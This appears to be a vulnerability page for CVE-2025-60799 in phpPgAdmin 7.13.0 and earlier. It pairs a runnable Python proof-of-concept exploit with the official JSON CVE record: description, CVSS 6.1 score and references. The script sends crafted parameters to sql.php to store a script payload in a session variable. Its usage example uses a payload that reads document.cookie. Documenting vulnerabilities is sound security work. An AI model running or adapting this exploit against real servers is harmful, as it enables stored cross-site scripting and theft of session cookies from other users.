CVE-2025-60799

import requests import sys # CVE-2025-60799 PoC - phpPgAdmin Session Variable Manipulation # Target: phpPgAdmin <= 7.13.0 (sql.php lines 68-76) def exploit_cve_2025_60799(target_url, attacker_query="<script>alert('XSS')</script>"): """ Exploit for CVE-2025-60799: phpPgAdmin Incorrect Access Control Allows unauthorized manipulation of session variables via user-controlled parameters """ # Target endpoint endpoint = f"{target_url.rstrip('/')}/sql.php" # Malicious parameters to manipulate session variables # These parameters are accepted without proper validation (lines 68-76) params = { 'subject': 'server', 'server': '1', # Server ID 'database': 'postgres', # Database name 'queryid': 'malicious_query', # Arbitrary query identifier 'query': attacker_query # Injected SQL/XSS payload } print(f"[*] Targeting: {endpoint}") print(f"[*] Injecting payload: {attacker_query}") try: # Send request with malicious parameters # No authentication required (PR:N), but user interaction needed (UI:R) response = requests.get(endpoint, params=params, timeout=10) # Check if request was successful if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[+] Payload stored in session variable: $_SESSION['sqlquery']") print(f"[*] Next victim accessing sql.php will trigger the stored payload") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url> [payload]") print(f"Example: python {sys.argv[0]} http://vulnerable-server/phppgadmin '<script>alert(document.cookie)</script>'") sys.exit(1) target = sys.argv[1] payload = sys.argv[2] if len(sys.argv) > 2 else "<script>alert('CVE-2025-60799')</script>" exploit_cve_2025_60799(target, payload)

{"cve": {"id": "CVE-2025-60799", "sourceIdentifier": "[email protected]", "published": "2025-11-20T15:17:38.533", "lastModified": "2025-11-25T19:08:52.227", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "phpPgAdmin 7.13.0 and earlier contains an incorrect access control vulnerability in sql.php at lines 68-76. The application allows unauthorized manipulation of session variables by accepting user-controlled parameters ('subject', 'server', 'database', 'queryid') without proper validation or access control checks. Attackers can exploit this to store arbitrary SQL queries in $_SESSION['sqlquery'] by manipulating these parameters, potentially leading to session poisoning, stored cross-site scripting, or unauthorized access to sensitive session data."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phppgadmin_project:phppgadmin:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.13.0", "matchCriteriaId": "AC3CB38F-12CA-4FA6-98DB-FFCC98F26715"}]}]}], "references": [{"url": "https://github.com/phppgadmin/phppgadmin/blob/master/sql.php#L68-L76", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60799.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}